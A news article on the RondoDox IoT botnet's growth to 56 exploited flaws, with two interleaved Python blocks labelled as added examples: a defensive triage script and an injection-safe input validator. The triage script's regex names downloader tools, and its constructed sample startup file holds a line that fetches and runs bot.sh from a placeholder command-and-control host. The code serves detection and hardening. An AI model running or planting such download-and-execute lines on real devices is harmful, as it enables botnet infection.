RondoDox IoT botnet swells to 56 exploits in shotgun campaign


Ancient vulnerabilities targeted.

Multiple security researchers have detailed a large escalation in the RondoDox Internet of Things (IoT) botnet campaign, which now weaponises 56 vulnerabilities across more than 30 vendors after initially targeting just two flaws.


Security vendor Trend Micro's Zero Day Initiative and research teams reported that active exploitation has been observed globally since mid-2025, with several vulnerabilities now included in the United States Cybersecurity and Infrastructure Security Agency's Known Exploited Vulnerabilities (CISA KEV) catalogue.

The initial RondoDox analysis, published by FortiGuard Labs earlier this year, identified the botnet exploiting two vulnerabilities, CVE-2024-3721 in TBK DVR devices and CVE-2024-12856 in Four-Faith routers.

RondoDox operators have now adopted what Trend Micro describes as an "exploit shotgun" approach, firing off multiple exploits to see which ones successfully compromise targets.

Their expanded arsenal includes 50 command injection flaws, two path traversal flaws, and instances of buffer overflow, authentication bypass, and memory corruption vulnerabilities.

Legacy vulnerabilities feature prominently, including the Shellshock bug (CVE-2014-6271), disclosed in 2014, and multiple flaws in end-of-life devices.

Eighteen of the targeted flaws have no assigned CVE identifier, while 38 have been formally catalogued.

Trend Micro's first RondoDox intrusion attempt was detected on June 15 2025, exploiting CVE-2023-1389 in the TP-Link Archer AX21 router's wide area network (WAN) interface.

That vulnerability was originally demonstrated at Pwn2Own Toronto in December 2022 by researchers Tri Dang and Bien Pham from Qrious Secure, who exploited authentication bypass and command injection flaws in the TP-Link AX1800 device.

It was reported to TP-Link on January 15 2023, but has now resurfaced in the RondoDox campaign more than two years later.

FortiGuard Labs' earlier analysis suggested that RondoDox employs XOR encoding to obfuscate its configuration data.

It also mimics legitimate traffic from gaming platforms and VPN services to evade detection.

The malware disguises its traffic as that of the gaming platforms Valve, Minecraft, Roblox and Fortnite, the comms tool Discord, the VPN services OpenVPN and WireGuard, and other popular services.

RondoDox establishes multiple persistence mechanisms to maintain presence on compromised systems, even if individual components are detected and removed.

The malware modifies system startup files including /etc/rcS, /etc/init.d/rcS, and /etc/inittab, whilst also creating crontab entries for both user and root accounts.

It actively terminates competing malware and analysis tools, scanning for processes related to cryptocurrency miners, network utilities like Wireshark, and debugging tools such as gdb.

The malware also renames critical system executables to random character strings, disrupting firewall configuration, user account management, and shutdown operations.
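The persistence and tampering described above (startup-file edits, crontab entries, renamed system binaries) can be triaged on a suspect device or a mounted firmware image. The following script is an added example for this article, not code from Trend Micro, FortiGuard or CloudSEK; the crontab locations, the binary paths, the heuristic pattern and the sample rcS content are assumptions, not indicators from the article.

```python
import json
import re
from pathlib import Path

# Startup files the article names as modified by RondoDox; the crontab spool
# locations and the binary paths below are assumptions for a typical embedded Linux.
STARTUP_FILES = ["/etc/rcS", "/etc/init.d/rcS", "/etc/inittab"]
CRONTAB_DIRS = ["/var/spool/cron/crontabs", "/var/spool/cron", "/etc/cron.d"]
# Firewall, account-management and shutdown binaries the article says get renamed.
EXPECTED_BINARIES = ["/sbin/iptables", "/usr/sbin/useradd", "/usr/bin/passwd",
                     "/sbin/shutdown", "/sbin/reboot", "/sbin/halt"]
# Heuristic (an assumption, not an IoC from the article): a downloader, something
# executed from a scratch directory, or a chmod that makes a file executable.
SUSPICIOUS = re.compile(r"\b(wget|curl|tftp|ftpget)\b|/(tmp|dev/shm)/\S+|chmod\s+(\+x|[0-7]{3,4})")

def suspicious_lines(text: str) -> list[str]:
    """Non-comment lines of a startup file or crontab that match the heuristic."""
    return [s for s in (ln.strip() for ln in text.splitlines())
            if s and not s.startswith("#") and SUSPICIOUS.search(s)]

def missing_binaries(present: set[str]) -> list[str]:
    """Expected binaries absent from the paths found on disk (renamed or removed)."""
    return [b for b in EXPECTED_BINARIES if b not in present]

def triage_host(root: str = "/") -> dict:
    """Run both checks on a live system, or on a firmware image mounted at `root`."""
    findings = {}
    files = [Path(root) / f.lstrip("/") for f in STARTUP_FILES]
    for d in CRONTAB_DIRS:
        files += [p for p in (Path(root) / d.lstrip("/")).glob("*") if p.is_file()]
    for p in files:
        if p.is_file():
            hits = suspicious_lines(p.read_text(errors="replace"))
            if hits:
                findings[str(p)] = hits
    present = {b for b in EXPECTED_BINARIES if (Path(root) / b.lstrip("/")).exists()}
    if missing_binaries(present):
        findings["missing_binaries"] = missing_binaries(present)
    return findings

# Constructed sample rcS (not captured from a device; the URL is a placeholder).
SAMPLE_RCS = """#!/bin/sh
mount -t proc proc /proc
/tmp/.x/rondo &
cd /tmp; wget http://C2-PLACEHOLDER/bot.sh; chmod +x bot.sh; ./bot.sh
"""

if __name__ == "__main__":
    print(json.dumps(triage_host(), indent=2))  # pass a mount point as root to scan an image offline
```

A missing `/sbin/iptables` or `/sbin/shutdown` on a device that shipped with them is the renaming behaviour the article describes; confirm against a clean firmware image before acting on it.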

RondoDox is also being distributed through a loader-as-a-service (LaaS) infrastructure that packages it alongside Mirai and Morte payloads.

CloudSEK researchers discovered the operation through exposed command and control logs spanning six months, and reported a 230 percent attack spike for the campaign between July and August 2025.

The LaaS model employs a sophisticated botnet panel that processes requests through specific modules, with markers including ReplyPageLogin for authentication attempts, ConfigSystemCommand for injection staging, and ReplySuccessPage for successful payload delivery.

Attack vectors focus on command injection via unsanitised POST parameters in fields such as network time protocol (NTP), syslog, hostname, and ping configurations within web interfaces of routers and embedded devices.
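The fix for this bug class is an allow-list check on the host field followed by an exec that never passes the value through a shell. This is an added example for the article, written in Python for readability rather than the C CGI handlers typical of router firmware; `is_valid_host` and `ping_host` are names chosen here, not from any vendor's code.

```python
import ipaddress
import re
import subprocess

# RFC 1123 label: alphanumerics and hyphens, no leading or trailing hyphen, 1-63 chars.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")

def is_valid_host(value: str) -> bool:
    """Allow-list check for NTP, syslog and ping host fields: an IP literal or a hostname.
    Shell metacharacters (; | & $ ` spaces) can never pass, so injection is rejected
    before any command is built."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return all(_LABEL.match(label) for label in value.rstrip(".").split("."))

def ping_host(value: str, count: int = 1) -> int:
    """Hardened diagnostic handler. The vulnerable pattern the article describes is
    the equivalent of os.system("ping -c 1 " + value); here the value is validated
    and then passed as its own argv element, so no shell ever parses it."""
    if not is_valid_host(value):
        raise ValueError("rejected host parameter")
    proc = subprocess.run(["ping", "-c", str(count), value],
                          capture_output=True, timeout=15)
    return proc.returncode
```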

The LaaS campaign has expanded beyond consumer devices to target enterprise applications including Oracle WebLogic servers through remote code execution vulnerabilities, alongside known flaws in WordPress and vBulletin systems, CloudSEK said.

Multiple Linux architectures including Intel 80386, MC68000, MIPS R3000, PowerPC, SuperH, ARCompact, x86-64, and AArch64 are now supported by the malware.

The vulnerability list spans networking equipment from D-Link, Netgear, TP-Link, Cisco, TOTOLINK, and Zyxel, alongside DVR and NVR systems from TBK, TVT, LILIN, and AVTECH.

Copyright © iTnews.com.au . All rights reserved.